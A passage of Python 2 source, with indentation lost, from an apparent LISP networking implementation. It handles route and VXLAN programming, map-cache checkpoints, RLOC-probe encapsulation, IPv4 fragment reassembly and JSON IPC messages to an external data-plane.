# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulated with a source-port of 4341
# and a destination adddress and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsualted packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happensu
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If are an RTR, we can process the stats directly. If are an ITR we need
# to send an IPC message the the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
